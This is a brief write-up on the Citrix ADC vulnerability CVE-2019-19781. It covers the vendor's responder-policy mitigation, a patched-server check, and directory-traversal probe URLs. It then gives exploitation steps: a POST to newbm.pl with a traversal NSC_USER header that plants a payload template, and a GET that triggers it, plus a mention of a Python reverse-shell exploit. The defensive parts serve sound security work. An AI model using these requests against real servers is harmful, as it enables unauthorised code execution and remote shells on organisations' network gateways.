Citrix Admin URL RCE (CVE-2019-19781)
Check the vulnerability
From the Citrix report, it's look like using a crafted URL you can bypass user permissions. The fix is the following:
enable ns feature responder
add responder action respondwith403 respondwith "\"HTTP/1.1 403 Forbidden\r\n\r\n\""
add responder policy ctx267027 "HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/vpns/\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\"/../\"))" respondwith403
bind responder global ctx267027 1 END -type REQ_OVERRIDE
save config
A legit URL is https://<host>/vpn/tmindex.html, then you should access the admin
panel using the custom URL https://<host>/vpn/..%2fvpns/apps.html.
You can test this vulnerability by downloading some executable files:
/vpn/../vpns/services.html
/vpn/../vpns/cfg/smb.conf
You can check if a server is patched because it returns the following line as a HTTP response:
HTTP/1.1 403 Forbidden
Exploit
A full exploit can be download here. It uses a Python reverse-shell, so you need a listener. To exploit the vulnerability you need to perform the following requests:
- Create a fake template file containing the payload based on the
NSC_USERheader - Request the created file to execute the payload
POST https://{host}:{port}/vpn/../vpns/portal/scripts/newbm.pl
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
NSC_USER: ../../../netscaler/portal/templates/<filename>
NSC_NONCE: <nounce>
url=127.0.0.1&title=<payload>&desc=desc&UI_inuse=a
GET https://{host}:{port}/vpn/../vpns/portal/<filename>.xml
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
NSC_USER: <randomuser>
NSC_NONCE: <nounce>